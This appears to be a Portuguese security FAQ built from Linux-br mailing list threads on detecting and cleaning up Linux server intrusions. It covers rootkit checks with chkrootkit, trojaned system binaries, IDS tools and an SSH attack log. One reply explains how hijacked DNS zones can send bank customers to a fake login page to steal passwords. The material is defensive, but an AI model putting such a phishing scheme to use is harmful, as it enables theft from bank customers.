http://www.zago.eti.br/firewall/invasao.txt Dicas pra proteção a invasão, FAQ com mensagens da Linux-br e outras listas. Use CTRL+F para refinar a pesquisa. veja neste diretorio (site) outros FAQ sobre segurança e firewall http://www.zago.eti.br/firewall/ seguran.txt rootkit.txt ******************************************** http://www.nbso.nic.br/index-po.html Estatitisticas sobre incidentes na internet brasileira. Os serviços prestados pelo NBSO incluem: Ser um ponto único para notificações de incidentes de segurança, de modo a prover a coordenação e o apoio necessário no processo de resposta a incidentes, colocando as partes envolvidas em contato quando necessário. ******************************************** http://idgnow.uol.com.br/AdPortalv5/SegurancaInterna.aspx?GUID=F1104E8E-5CCE-4BBF-BB3F-E6CAC6A1D2C7&ChannelID=21080105 Estudo alerta companhias para hackers internos ******************************************** http://www1.folha.uol.com.br/folha/informatica/ult124u14050.shtml Noticia sobre invasão pelo modem, muitas empresas tem modens conectados na rede e permitem conexão remota, na maioria das vezes sem proteção, tornando mais fácil a invasão pelo modem. ******************************************** Algumas noticias interessantes... http://idgnow.uol.com.br/AdPortalv5/SegurancaInterna.aspx?GUID=479D5746-701B-4B24-BE26-E844E15CA77F&ChannelID=21080105 Estudo diz que Linux resiste mais às invasões Terça-feira, 18 janeiro de 2005 - 12:17 IDG Now! Comparativo entre Linux x Solaris e Windows. ******************************************** Quando tiver problemas com invasão lembre de: Nuca tentar consertar o estrago usando a mesma instalação ou tentar reconfigurar, faça uma nova instalação e de preferencia com uma nova versão se disponivel ou após a instalação atualize todos os pacotes, atualização constante aumenta muito a segurança. O invasor pode voltar e explorar a mesma falha, na nova instalação faça uma analise profunda dos direitos, firewall, pacotes instalados, scripts e outros pontos que suspeitar, procure por softwares reconhecidamente mais seguros, por exemplo ssh é muito mais seguro que telnet, troque as senhas e muito cuidado com usuarios internos e ex-funcionarios até mesmo de terceiros que prestam algum tipo de serviço e tem acesso à rede ou que tenha acesso à maquina, houvi especialistas afirmarem que aproximadamente 80 por cento destes problemas tem colaboração de funcionarios internos que diretamente ou indiretamente por descuido facilitam ou contribuem com o invasor. Em maquinas que estão de cara para a internet instale somente o necessário, mantenha seus pacotes sempre atualizados, monitore os logs constantemente, numca permita acesso de estranhos nem instale programas duvidosos. Na recuperação de backup tenha muito cuidado com scripts, não recupere programas executáveis instale-os novamente obtendo de fonte segura e quando for possivel compare a chave MD5. Nunca execute binários na máquina invadida, o invasor pode ter substituido algum executável, esta prática é muito comum, eles substituem os executáveis de comandos mais usados como ls, rm, find e etc.., caso execute algum binario, pode acabar executando o malicioso implantado pelo invasor. Considere o uso deste HD fora da rede, em ambiente controlado, por exemplo, clonar o HD ou conectar em outra maquina como secundario pra montar e analizar com calma sem risco de executar scripts ou binarios, sem modificar ou apagar qualquer informação. Em casos de emergencia que precise executar algum aplicativo, lembre que é muito arriscado, mas pra tentar diminuir os riscos, como voce não sabe o que foi modificado, não tente remover e reinstalar, nem sobrepor os pacotes, faça copia de uma máquina de confiança e salve em diretório diferente pra execuar a partir deste diretório, dentro do diretório use ./ ou informe o caminho completo, use scp pra copiar ou NFS pra montar diretório de outra maquina com os binarios disponiveis. ******************************************** O noaccess vc encontra em www.angelfire.com/oh2/alfahp (IPcapture) ou em algumas ezines. O noaccess na verdade eh a parte menos importante dessa ratueira, ele apenas mostra uma menssagem na tela informando o servico e o IP de quem tentou acessar, os quais eh passado por parametro. Talvez por isso q o livro naum forneceu o codigo do programa. Subject: (linux-br) Ratuera para Lammer > > Estive dando uma olhada em um livro e eles mostravam com fazer para montar > uma ratuera ( Termo bem grotesco ) para fazer quem esta tentando invadir em > algumas portas. > A dica era o seguinte: > > Dentro do Arquivo : /etc/Deny > > All:All:twist /var/noaccess %h %d;\ > \bin\echo -e "%h Tentou acessar %d " >> /var/log/security.log > > A ideia é que ele pegue os ip que tentou acessar, e isto é feito atraves do > programa em c chamado noaccess , mas na porcaria do livro não passou o > programa para que possamos testar. > > Alguem sabe como porderia fazer um programa deste ou sabe onde tem? ******************************************** Editorial Em http://www.pcs.usp.br/~jkinoshi/bs/b010827.html eu havia comentado que através do comando "top" vi que o "nobody" usava o "find". Então como descobrir se isso era uma invsão? O comando pstree fornece a árvore dos processos no momento: ele me deu uma boa dica do que acontecia em minha máquina. Pude verificar (numa das situações) que estava ocorrendo um "updatedb" que faz o update da base de dados para o comando "locate". Sendo que o updatedb era disparado pelo anacron. Agradeço a participação do lightwave que apresenta um caminho para se lidar com invasões. -------------------------------------------------------------------------------- Pergunta em Foco pergunta: [21-08-01] jkinoshi Como saber se meu micro está sendo invadido? -------------------------------------------------------------------------------- resposta 1 [22-08-01] lightwave Essa é uma pergunta muito vaga, sei que é o mesmo que mantém esse fórum, mas tudo bem, que sirva para outras pessoas, primeiro você tem que conhecer muito bem o sistema que trabalha, os protocolos que usa, os serviços que executa, para então saber se há vestígio de invasão, a não ser que o invasor te ligue dizendo que invadiu teu computador, algo que você tem que ter muito cuidado é com seu /var/log, faça backups diário dele, e monitore o bem, veja se houve alterações nele que foi outro usuário ou serviço que gravou num arquivo de logo, que não seja o serviço que o usa, isso para atesta a validade de seus arquivos de log, depois veja os próprios logs, veja os sinais estranhos que existe, quem usou tal serviços, o que acessou o que, e assim por diante, o trabalho de detecção de invsação é um trabalho de perícia e dissecação do seus sistema, ferramentas como rootkit pode te ajudar no serviço, cuidado com os KLM (kernel loadable modules), eles são nossa pior ameaça no mundo linux, pior do que os virus do windows, há cuide sempre de seus usuários mesmo de sistema, mantenha só os usuários que são necessário e os impessa de ficar passeando no seu sistema, esses usuários são os mais usados para travessias, enfim, notitore suas conexões de rede, e crie boas regras com o ipchais e feche tudo que não for usar todos os serviços, deixe só o que você usa, por exemplo, pra que vc deixa o serviço finger executando se você não usa, e é aí que alguém pega muita informação de sua máquina, bem é só isso, mas se você queiser informações mais específicas, poste outra mensagem. -------------------------------------------------------------------------------- resposta 2 [22-08-01] jkinoshi Oi lightwave, obrigado pela resposta, mas esta pergunta estará vinculada à um boletim mais específico. Já adiantando, vamos aos fatos: após instalar o debian e não fechar as portas (por acreditar que o debian é seguro) vi meu winchester piscando sem que houvesse motivo aparente. Dei o comando "top" e vi que era o "nobody" executando "find". O que você faria para comprovar se estava ou não havendo invasão? Que comandos usaria? Eu usei um comando simples que me resolveu a indagação e estarei compartilhando na semana que vem. Tem alguma idéia? Jorge Kinoshita. -------------------------------------------------------------------------------- resposta 3 [23-08-01] lightwave Hum, deveria ser ele mesmo, mas tudo bem, bem, primeiro eu olharia o como estava minhas conexões com a internet, ou seja quem estava acessando meu computador, nesse caso, usaria o iptraf que está nos CD's do debian, para ver quem estava conectado, com essas informações já teria os ips das máquinas conectadas no memento, segundo, usaria o ngrep, para dar uma olhada para ver se as saída do find estava sendo enviada para outra máquina, find aliado com o less ou more torna se uma ferramenta perigosa, tormara que você tenha habilitado as senhas ocultas e o md5, espero também que você não tenha scripts de backup guardado em algum lugar, pois a primeira coisa que vai ser procurada é no /etc/cronttab, cron.daily e os outros para saber se você tem scripts de backups lá, pois depois que os sinais estão gravados o ivasor vai procurar seus arquivos de logs e depois o backup deles para alterá-los, portanto um concelho, NÃO DEIXE SEUS SCRIPTS DE BACKUP no cronttab, grave os em um arquivo de loopback criptografado de preferência com o serpentine ou o des, que são mais difíceis de quebrar, segundo, quarde o em um lugar fora do alcance de acessos os meus scripts de alta segurança fica em um loopback criptgrafado em serpentine gravados no cd o arquivo, quando vou fazer o backup, ponho o dicos, acesso os scripts via loop e só então executo o backup, sempre deixo minhas partições de backup desmontadas, e não as deixo no fstab. Bem essa é minha solução, para os casos mais simples de varreguda no meu sistema. Outra coisa muito importante, se você instalou seções extras de man pages ou info, o cron irá idexar esses diretórios para saber onde elas estão, sempre é feita uma verredua no seus sistema prucurandos esses arquivos e indexandos-o para acessar através do http://localhost/doc, normalmente o servidor web faz isso, mas não sei no teu caso em que máquina você instalou; Outra coisa use o tcpquota para impedir que certos usuários possa abrir seções tcp sem sua altorização, E USE IPCHAINS PARA fechar tudo quanto é porta que você não use, e tire aquele monte de serviços do inetd que você não usa, deixe só o necessário, bem é isso, estou trabalhando com as informações que você me passou, espero que não seja uma invasão, mas vamos ver quando você nos der detalhes disso tudo; -------------------------------------------------------------------------------- resposta 4 [23-08-01] lightwave Estava olhando aqui no meu top e vi que o usário do apache é o www-data, é melhor você dá uma olhada em seu cronttab e rastrear o programa que usa o usário nodata e olhe no seu arquivos de log's, agora sim, isso me parece muito estranho, por via das dúvidas desabilite telnet rlogin e outros serviços de rede que você não usa, olhe em sue /etc/modules e /etc/modules.conf e /etc/modutils/aliases e veja se tem módulo estranho, veja também no arch se há algo estranho lá, veja também /etc/init.d/ e /etc/rc1.d e rc2.d se tem chamdas scripts estranhos lá, veja também todas as datas dos arquivos citados acima verifique se tem alguma com data deiferente da data da instalção, se você não tiver backups da sua instalação é melhor pensar em uma instalação novamente, se você fez um backup completo do sistema no ínicio da instalação é hora de restaurar os arquivos modificados, quidado com klm's eles rodam com privilégios especiais do kernel que nem o root tem e você tem que encontra-los e els não aparece com find, top, ntop ou outras coisas a mais, se possível nos dê mais detalhes sobre isso; -------------------------------------------------------------------------------- resposta 5 [23-08-01] jkinoshi Obrigadão pelas valiosas dicas. Vou verificar melhor várias das coisas que você menciona. Sendo mais minuncioso no que ocorreu: na hora que vi o nobody dando find levei um susto e rebootei o micro -naquele momento eu estava no telefone com um colega meu e não tinha muito que pensar-; fechei um monte de portas e depois de um certo tempo estava de novo o nobody com o find. Daí fui averiguar com netstat as conexões no momento. Não tinha nada mas até cheguei a desconectar o cabo da rede ... Daí eu fiquei com uma pulga atrás da orelha: qual processo disparou o find? E depois de averiguar isso fiquei mais tranquilo; pretendo publicar tudo isso em um boletim futuro, mas o que você escreveu é muito interessante e estarei estudando melhor; já adiantando tem tudo a haver com o cron. Até mais. ******************************************** São duas coisas completamente diferentes... O Nessus é um software Fingerprint (scanner de vulnerabilidades) e acho que vc está querendo um IDS - Intrusion Detect System (detector de intrusos). Tente o Portsentry (http://www.psionic.com/products/index.html) é muito bom.e fácil de configurar. Mas vc precisa ter uma boa noção de serviços e portas.. Exisem vários outros... Abraços > Olá pessoal.... > > Algúem conhece algum software que verifique uma máquina e detecte uma > atividade hacker? Não queria software como Nessus, que verifica as > vulnerabilidades, mas sim um software que vá mais fundo, e indique a > presença de atividade hacker. > O software pode ser comercial, for Linux ou RWindows. ******************************************** De: Fabio Corrêa Para: Linux-br Assunto: Re: (linux-br) Sistemas de detecção de intrusão Data: 04 Jul 2002 10:55:47 -0300 Daniel, Existem muitos sites para te auxiliar, mas eu te recomendaria os seguintes - www.bufferoverflow.com.br - www.linuxsecurity.com.br De dicas que posso te dar , acho que em primeiro lugar vc podia detectar as portas que estão abertas no seu servidor, através do programa nmap , disponivel nesse sites que indiquei. Existem muitos outros recursos , acho que já dá pra vc exergar o caminho !! Fabio ----- Original Message ----- From: "Daniel H. F. e Silva" To: Sent: Thursday, July 04, 2002 9:12 AM Subject: (linux-br) Sistemas de detecção de intrusão > Caros amigos, > Recentemente recebi a responsabilidade de administrar um servidor Conectiva Linux 7.0. Gostaria > de receber sugestões sobre sistemas de detecção de intrusão (de preferência free-software) que > melhor se adaptem ao perfil de meu servidor, que é um servidor provendo serviços Web, banco de > dados, telnet e ftp. > O que mais poderiam me recomendar para tornar meu servidor mais seguro? ******************************************** De: Rogerio Araujo(Terra) Para: linux-br@bazar.conectiva.com.br Assunto: (linux-br) Invasão - Netstat e ps Data: 12 Aug 2002 11:20:47 -0300 foi detectada uma invasão em uma de minhas redes. uma instalação recente que realizei. depois de detectada a maquina foi retirada da rede e fui executar diversos testes, inclusive o chkrootkit. O retorno do mesmo está logo abaixo. Só que não consigo eliminar o programas PS e NETSTAT que foram alterados. O que quero é eliminar o PS e o NETSTAT que o vagabundo instalou e colocar os padrões que vem na minha distribuição. Além disso queria saber como eliminar o LMK Trojan observem o resultado do chkrootkit , algumas partes foram eliminadas para favorecer a leitura. Checking `ls'... not infected Checking `lsof'... not infected Checking `mail'... not infected Checking `mingetty'... not infected Checking `netstat'... INFECTED Checking `named'... not infected Checking `passwd'... not infected Checking `pidof'... not infected Checking `pop2'... not found Checking `pop3'... not found Checking `ps'... INFECTED Checking `pstree'... not infected Checking `rpcinfo'... not infected Checking `rlogind'... not infected Checking `rshd'... not infected Checking `slogin'... not infected Checking `sendmail'... not infected Checking `sshd'... not infected Checking `w'... not infected Checking `write'... not infected Checking `aliens'... /dev/ttyop /dev/ttyoa Searching for sniffer's logs, it may take a while... nothing found Searching for HiDrootkit's default dir... nothing found Searching for t0rn's default files and dirs... nothing found Searching for t0rn's v8 defaults... nothing found Searching for Lion Worm default files and dirs... nothing found Searching for RSHA's default files and dir... nothing found Searching for RH-Sharpe's default files... nothing found Searching for Ambient's rootkit (ark) default files and dirs... nothing found Searching for suspicious files and dirs, it may take a while... /usr/lib/perl5/5.6.0/i386-linux/.packlist Checking `bindshell'... not infected Checking `lkm'... You have 4 process hidden for ps command Warning: Possible LKM Trojan installed Checking `rexedcs'... not found Checking `sniffer'... eth0 is not promisc eth0:0 is not promisc eth1 is not promisc Checking `wted'... nothing deleted Checking `z2'... nothing deleted ******************************************** De: Andreas Hasenack Para: Rogerio Araujo(Terra) Cc: linux-br@bazar.conectiva.com.br Assunto: Re: (linux-br) Invasão - Netstat e ps Data: 12 Aug 2002 14:34:33 -0300 Em Mon, Aug 12, 2002 at 11:20:47AM -0300, Rogerio Araujo(Terra) escreveu: > Checking `lkm'... You have 4 process hidden for ps command > Warning: Possible LKM Trojan installed Rode: chkrootkit -x lkm e ele vai dizer os processos que estão escondidos. A partir daí você descobre qual foi o rootkit instalado. Melhor mesmo é rebootar com um kernel "limpo". Isso, claro, assumindo que você não consegue tirar essa máquina do ar e colocar uma substituta. Vai precisar reinstalar essa máquina, é a única forma de ter certeza que ela está limpa... r ******************************************** De: Rafael Santos Para: 2a. Vara Federal de Caxias do Sul Cc: Rogerio Araujo(Terra) , linux-br@bazar.conectiva.com.br Assunto: Re: (linux-br) Invasão - Netstat e ps Data: 12 Aug 2002 16:37:48 -0300 O que quero é eliminar o PS e o NETSTAT que o vagabundo instalou e colocar os padrões que vem na minha distribuição. Além disso queria saber como eliminar o LMK Trojan Tenta apt-get --reinstall install net-tools procps Tive o mesmo problema por aqui - os arquivos não podem ser apagados, sobreescritos, reinstalados via RPM, etc. Estava considerando pegar um ferro de solda e marcar os setores que eles ocupam, mas isto mostrou-se pouco prático ;-) Após passar alguns dias irritado e frustrado, encontrei a solução enquanto chicoteava um estagiário por ter comprado pão de queijo frio para o meu café da manhã: chattr e lsattr - com estes caras posso ver os atributos de um arquivo no ext2. Dei um lsattr no meu PS e ele indicou que o arquivo tinha um atributo "i" (de indestrutível ? ;-) Fui tentar mudar este atributo com o chattr e surpresa, este tinha sido removido provavelmente pelo mesmo cara que entrou no servidor. Este deu pra reinstalar com um rpm -i --force e2fsprogs. Resta saber se funcionam também no ext3. Os tais processos escondidos do trojan ainda estão aqui. Será que só a reinstalação do ls resolverá o problema ? Em tempo, uso RH 7.2 e estava com o wu-ftp mais escancarado do que a boca do Galvão Bueno. Troquei para proftpd. ******************************************** Olá! Ganhe um dinheiro extra ou apenas teste seus conhecimentos. Em http://www.openhack.com/ tem uma maratona para invadir, com autorização, servidores linux e windows. Boa Sorte! ******************************************** De: Marcus Lima Responder-a: marcuslima@marcuslima.eti.br Para: Angelo Rodrigues , linux-br@bazar.conectiva.com.br Assunto: (linux-br) RES: (linux-br) Portas Abertas! Fui invadido! Data: 23 Jan 2003 00:36:08 -0200 Eh cara, tem serviço demais rodando... Um jeito de saber se tem um sniffer é pegando um ifconfig de um linux da mesma versão e rodando nesta máquina (atente para as bibliotecas também)... Se a interface estiver em modo promiscuo então realmente tem um sniffer. Mas o fato de ter tanta coisa executando, pode ser que sua distro instale esse monte de coisas e inicie por padrão... Não se assuste tanto sem ter certeza. Um jeito legal de saber se tem algum worm ou exploit é rodando o chkrootkit, faça o download em www.chkrootkit.org e compile, execute e ele lhe dirá se tem algum worm conhecido. - Marcus Lima. ******************************************** De: Marcio Merlone Para: Luiz Carlos Nebenzahl Cc: linux-br@bazar.conectiva.com.br Assunto: Re: (linux-br) Dominios virtuais aparecendo do nada Data: 06 Dec 2002 13:02:17 -0200 On Thu, 2002-12-05 at 22:38, Luiz Carlos Nebenzahl wrote: > Oi Lista! > > > Seria possível aparecer zonas no arquivo /etc/named.conf do nada? Ou > seja, o administrador não as colocou la. > Zonas como bancodobrasil.com.br, ou itau.com.br. O estranho que são de > bancos! > > Luiz Carlos Nebenzahl Imagine o seguinte: Você faz uma cópia das páginas de entrada dos internet-banking em um servidor seu. Depois, redireciona os logins que acontecerem para uma página de erro, tipo "Página indisponível, por favor tente mais tarde." mas os dados que alguém entrar no form de login são armazenados. Que dados? Conta e senha. Daí vc redireciona pelo DNS as zonas dos bancos para este seu servidor e quem tentar entrar no banco na verdade vai cair na página falsa. Resultado: Vc vai ter as contas e senhas de uma porrada de contas. Depois é só sacar ou trasferir para alguma conta. Se foi isto, veja para que ips estão apontando as zonas e acesse as páginas dos bancos por estes ips. Se desconfiar, anote tudo e vá até a polícia que te invadiram para roubar senhas de bancos. E cuide mais da segurança dos teus servidores. -- Marcio Merlone ******************************************** De: Carlos A Silva Responder-a: Carlos A Silva Para: linux-br@bazar.conectiva.com.br Assunto: (linux-br) FUI INVADIDO !!! - Resposta à Lista !!!! (XL) Data: 29 Jan 2003 10:09:56 -0200 Pessoal, Muito grato por todas as dicas e orientações!!! De qualquer forma, tomei as seguintes providências: 1) através do tripwire (software que verifica, muito eficientemente, a integridade dos arquivos do sistema operacional após a instalação original), descobrí todos os arquivos que foram alterados. Já uso o tripwire a muito tempo e é através dele que eu descubro a existência de "ladrões dentro de casa", mesmo com as portas trancadas. 2) o chattr me permitiu deletá-los, substituindo-os pelos arquivos originais do CD 3) estou monitorando esse servidor em tempo integral, de forma remota, recebendo logs e alertas... mesmo sabendo que o conectiva 6.0 é deficiente em alguns aspectos de segurança, sou responsável por mais de (50) redes cujos servidores de intranet utilizam o conectiva 6.0... preciso descobrir por onde ele entrou!!!...é importantíssimo, para que eu providencie a correção da falha e repasse isso para os demais servidores... Portanto, esse servidor invadido agora é uma "isca" Grato, ******************************************** De: Marcus Lima Responder-a: Marcus Lima Para: Carlos A Silva , linux-br@bazar.conectiva.com.br, alrferreira@carol.com.br Assunto: Re: (linux-br) FUI INVADIDO !!!! (XL) Data: 29 Jan 2003 11:04:05 -0200 > Recomendo reinstalar o Linux nesta máquina, pois o invasor deve ter deixado > muitas e muitas backdoors em seu sistema "desatualizado" (Conectiva 6.0) ! Caro André, O fato dele estar usando o CL 6 não quer dizer que ele esteja desatualizado. A Conectiva distribui atualizações de segurança para as versões 6, 7 e 8. Ele precisa sim manter seus softwares atualizados. - Marcus Lima. ******************************************** De: Humberto Bomfim Para: linux-br@bazar.conectiva.com.br Cc: Carlos A Silva Assunto: Re: (linux-br) FUI INVADIDO !!!! (XL) Data: 29 Jan 2003 09:07:36 -0200 ele deve ter protegido os atributos desses arquivos. tenta dar um "chattr -i " e depois muda a permissão pra ver se funciona. mas eu concordo com a recomendação do André Luiz. ******************************************** De: Marco Aurélio Para: Lista-Linux-BR Lista , alrferreira@carol.com.br Assunto: Re: (linux-br) FUI INVADIDO !!!! (XL) Data: 29 Jan 2003 08:50:52 -0200 Cara reistale todo o sistema da maquina, e melhor, e coloque um versão mais atualizada e sempre atualiza o seu sistema, no Conectiva vc pode fazer isso de uma maneira bem simples usando o APT. Não adianta nada vc ter um firewall e deixar um serviço que e visto pela internet com o software desatualizado, assine listas de segurança, a propia conectiva tem um e visite regularmente o www.cert.org e o www.linuxsecurity.com.br. Vivendo e aprendendo, já passei por isso também... Falow.. Marco Aurélio ******************************************** De: Carlos A Silva Responder-a: Carlos A Silva Para: linux-br@bazar.conectiva.com.br Assunto: (linux-br) FUI INVADIDO !!!! (XL) Data: 28 Jan 2003 19:14:34 -0200 Pessoal, ->>Conectiva 6.0 Apesar de acompanhar rigorosamente as regras do meu firewall, infelizmente FUI INVADIDO. O danado não deixou rastros, inclusive apagou parte dos logs no /var/log (secure e messages). Descobri que fui invadido através de alguns softwares (tripwire...) que me avisaram. Vários arquivos foram substituidos (ls, find, top, ps, ...). Não consigo substituí-los. Não consigo apagá-los para colocar o original. Veja o exemplo do ps: -rwxr-xr-x 1 1000 1000 82436 Jun 5 2002 /bin/ps O cara mudou o nome do dono e grupo para 1000 1000 Quanto tento voltar para root.root (sendo usuário root), recebo a seguinte mensagem: chown: ps: Operation not permitted Quando tento matá-lo, também não consigo...vejam: rm: cannot unlink `ps': Operation not permitted E aí??? Como faço??? Alguém pode ajudar??? ******************************************** De: César B. Viegas Para: André Muraro , linux-br@bazar.conectiva.com.br Assunto: Re: (linux-br) Off topic - Kevin D.Mitnick em setembro no Brasil "Virou bonzinho" Data: 04 Feb 2003 09:33:35 -0200 Como assim ?! Eu vou pagar para assistir uma palestra com um cara que está a 5 anos fora do mercado(para não dizer 8, se ele foi capturado em 1994)? Alguém lembra de como era a internet a 5 anos atrás (modem de 28.800 linha que caía a toda hora)? Qual versão do Kernel havia 5 anos atrás? Para falar de segurança mínima, o Iptables nem existia, era tempo do ipchains apenas, e por aí vai? Em suma 5 anos fora do mercado em computação é quase uma vida inteira. Por mais que ele tenha tido tempo de estudar a teoria (já que ele estava "concentrado"), ele só agora pode ter acesso a intenet novamente, ou seja testar os estudos dele, só agora. É como diz um amigo meu, consultor de empresas, quem sabe "faz", quem não sabe, "manda alguém fazer", e quem não sabe "fazer" nem "mandar fazer", vira consultor. []'s César ============================================================== > Sua empresa está segura? Ninguém melhor para responder essa pergunta do que > Kevin D.Mitnick, o hacker que ficou mundialmente famoso burlando a segurança > de computadores e, que depois de cinco anos de prisão, agora preside a > Defensive Thinking, uma empresa de consultoria em segurança com sede em Los > Angeles. Mitnick será o keynote speaker do IT Conference. > Convidado especial do evento, que acontece de 17 a 19 de setembro, no De: JB Para: César B. Viegas , linux-br@bazar.conectiva.com.br Assunto: Re: (linux-br) Off topic - Kevin D.Mitnick em setembro no Brasil "Virou bonzinho" Data: 04 Feb 2003 10:21:19 -0300 Tbm concordo q este sujeito nao terah conhecimentos em termos praticos e experiencia pra se tornar um modelo pra todos... na realidade eu li q na epoca o q ele realmente usou bastante foi engenharia social, o q demonstra q ele nao eh burro e sim um estelionatario q conseguiu ficar famoso por utilizar computadores em algumas tarefas. Nao estou querendo tirar os "meritos" do cara, soh nao vou pagar pra ver ele falando e nem vou prestar atencao em palestras q tem o maior objetivo de elege-lo o supra sumo da bandidagem... Na minha opiniao trata-se de inversao de valores. Como disse o Cezar na outra mensagem: o sujeito estava "concentrado", mas isto nao quer dizer q ele tenha conhecimentos praticos em nada mais... serah q estou enganado??????? Soh pra enfatizar: trata-se de minha opiniao pessoal e nao tenho o objetivo de agredir a ninguem q admire o cara. []´s De: Henrique Cesar Ulbrich Para: linux-br@bazar.conectiva.com.br Assunto: (linux-br) Off topic - Kevin D.Mitnick em setembro no Brasil "Virou bonzinho" Data: 04 Feb 2003 11:44:21 -0200 Historiadores acreditam que, em Ter 04 Fev 2003 09:33, César B. Viegas disse: > Como assim ?! Eu vou pagar para assistir uma palestra com um cara que > está a 5 anos fora do mercado O grande lance do Mitnick não é tecnologia, mas engenharia social. O cara provavelmente não vai palar sobre como fechar seu Linux 1.2 com IPFW, mas como usar a ingenuidade dos seus funcionários para conseguir informações vitais sobre sua empresa e sobre você. Como técnico, Mitnick é meio limitado. Tanto que foi pego por um simples IDS. Mas como enganador salafrário, ele é muito bom. -- Henrique Cesar Ulbrich henrique@digerati.com.br De: Henrique Cesar Ulbrich Para: linux-br@bazar.conectiva.com.br Assunto: (linux-br) Off topic - Kevin D.Mitnick em setembro no Brasil "Virou bonzinho" Data: 04 Feb 2003 11:51:16 -0200 Bem, talvez possamos continuar esta discussão em uma lista de aministradores, onde o assunto não é off-topic. Sugestões? De qualquer forma, há administradores aqui, portanto o assunto é válido, embora OT. Historiadores acreditam que, em Ter 04 Fev 2003 11:21, JB disse: > vou prestar atencao em palestras q tem o maior objetivo de elege-lo o > supra sumo da bandidagem... Inversão de valores ... Tem toda a razão: é mesmo. Só que saber como esses caras agem é primordial para implementar políticas de segurança em sua empresa que vão ALÉM de criptografia + FW + AV. Não adianta vocÊ possuir o melhor firewall do mundo e suas estações falarem entre si por VPNs internas criptografadas se seus funcionários alegremente dão por telefone informações válidas e confidenciais a qualquer um que se apresente como gerente da filial de Salvador. Pode parecer bobagem, que ninguém faria isso, mas sim, acontece e muito. -- Henrique Cesar Ulbrich henrique@digerati.com.br De: Paulo K. Todoroki Para: César B. Viegas Cc: linux-br@bazar.conectiva.com.br, André Muraro Assunto: Re: (linux-br) Off topic - Kevin D.Mitnick em setembro no Brasil "Virou bonzinho" Data: 04 Feb 2003 12:52:53 -0300 Caros amigos: Sempre respeitando a opinião dos demais participantes, gostaria de expor a minha: Mesmo que o Kevin tenha ficado muito tempo afastado dos computadores, o "forte" das técnicas hacker que ele utilizava era muito mais o dito "engenharia social" do que via programas propriamente. Ou seja, o Kevin se utilizava muito dos seus dotes de ator e enganava as pessoas das quais ele queria tirar alguma informação importante, muitas vezes cruciais para se conseguir acesso a determinados sistemas. Certamente ele deve estar (muito...) desatualizado em termos de sistemas, mas PESSOAS são PESSOAS e a forma de enganá-las praticamente é a mesma. Li em algum lugar o seguinte: "engana-se quem diz que o computador mais seguro é aquele que está desligado". É aí que temos alguma coisa a aprender com o Kevin - eu pelo menos iria com esse espírito. Infelizmente não vou poder ir pois a distância é muito grande e não tenho disponibilidade de tempo. Sugiro a algum companheiro que tenha essa oportunidade única de ir à palestra, compartilhar conosco o conteúdo do encontro. Acho que muita coisa interessante deve sair de lá. Em tempo: leiam o livro "Takedown" que fala da prisão do Kevin. Leitura leve e descontraida. Muito legal - vale a pena. Grande abraço a todos! ******************************************** De: Thiago Macieira Para: Carlos A Silva Cc: linux-br@bazar.conectiva.com.br Assunto: Re: (linux-br) FUI INVADIDO !!!! (XL) Data: 29 Jan 2003 18:36:16 +0100 Carlos A Silva wrote: >chown: ps: Operation not permitted > >Quando tento matá-lo, também não consigo...vejam: > >rm: cannot unlink `ps': Operation not permitted > >E aí??? >Como faço??? >Alguém pode ajudar??? Sim: faça backup de todos os seus dados importantes e configurações e REINSTALE. Seu sistema está comprometido. Não confie em programa nenhum que esteja nele. Não faça backup de programas. -- ******************************************** De: caio ferreira Para: linux-br Assunto: (linux-br) ICQ e Relatorios de invasao Data: 13 Mar 2003 11:55:33 -0300 On Wed, 12 Mar 2003 17:10:33 GMT "javascript" wrote: > Sou novato no linux, entao pode que alguns termos n_o estejam muito bem > expressos nas perguntas, mas a_ va_. > > Pergunta 1 : Eu tenho uma rede de 10 maquinas win98 ligadas a um proxy > com Servidor da Conectiva 8. > Quero saber como eu fa_o para bloquear o ICQ usando o iptables como firewall > ? tem alguma outra solu__o ? qual seria ? como eu faria ? www.underlinux.com.br/modules.php?name=Sections&op=printpage&artid=176 > Pergunta 2 : Outra pergunta que eu tenho como eu fa_o para ter relat_rios > dos IP's que tentaram invadir o servidor linux "conectiva 8", quais portas > tentaram usar, at_ onde foram , o que conseguiram visualizar, hor_rios .... > ou seja um relat_rio completo. Tem um software chamado snort que pode te ajudar. ******************************************** De: Danilo Magacho Para: Carlos A Silva Cc: linux-br@bazar.conectiva.com.br Assunto: Re: (linux-br) Fui atacado!!! SSh Porta 22 - Conectiva 6.0 !!!! (XL) Data: 11 Apr 2003 21:23:10 -0400 Caro: Versões do SSH anteriores a 2.2.9 são vulneraveis a Buffer Overflow. Anteriores a 3.4, se você se deparar com um safado bom de programação ele pode enviar certas sequencias ao seu ssh que vão permitir que ele se conecte como Root sem fornecer senha. Dica: Para os serviços de grande risco (SSH, Sendmail/POP, Bind e outros deste calibre) atualize a versão periódicamente, verificando, por exemplo em http://cve.mitre.org a existencia de vulnerabilidades nos serviços que você habilita. Má noticia: Esse cara não é um iniciante e nem tampouco um aventureiro, ele sabe exatamente o que fez. Sds Danilo Carlos A Silva wrote Vejam o log do ataque: Apr 7 19:29:25 server01 sshd[15950]: Disconnecting: Corrupted check bytes on input. Apr 7 19:31:00 server01 sshd[15979]: Disconnecting: crc32 compensation attack: network attack detected Apr 7 19:44:29 server01 sshd[16123]: Accepted without authentication for ROOT from 194.226.123.190 port 2436 ******************************************** De: Marcus Lima Responder-a: Marcus Lima Para: Maurício , linux-br@bazar.conectiva.com.br Assunto: Re: (linux-br) ataque e invasão Data: 16 Apr 2003 19:08:14 -0300 hehehe... o nome do programa é bem sugestivo... www.securityfocus.com - Assina a BUGTRAQ e mantenha-se atualizado. apt-get upgrade - para atualizar sua distro. - Marcus Lima. ******************************************** De: Marcus Lima Responder-a: marcuslima@marcuslima.eti.br Para: Ronaldo Saheki , linux-br Assunto: (linux-br) RES: (linux-br) Infectado por Rootkit Data: 24 Apr 2003 07:53:17 -0300 Apache 1.3.23 está desatualizado (a não ser que tenha sido aplicado Patch) (O Sendmail também pode estar com falha se não for a versão com patch) Mas aposto no OpenSSH 3.1p1 :)) Sobre o Rootkit, geralmente eles recriam o ps, ls, top, ifconfig, last, entre outros binários para esconderem a existência do Rootkit, acho que você deveria usar o AIDE para monitorar modificações nesses arquivos. Boa sorte da próxima vez! :) - Marcus Lima. ******************************************** De: Ronaldo Saheki Para: linux-br Assunto: (linux-br) Infectado por Rootkit Data: 24 Apr 2003 03:34:26 -0300 Olá pessoas, Bem, encontrei uma máquina aqui infectada por um rootkit, porém usando ac, last e lastlog para verificar os usuários que se logaram, não encontrei nenhum usuário além de mim. Os logs dos serviços de apache, sendmail, e os logs do ssh (secure) não indicam nenhuma 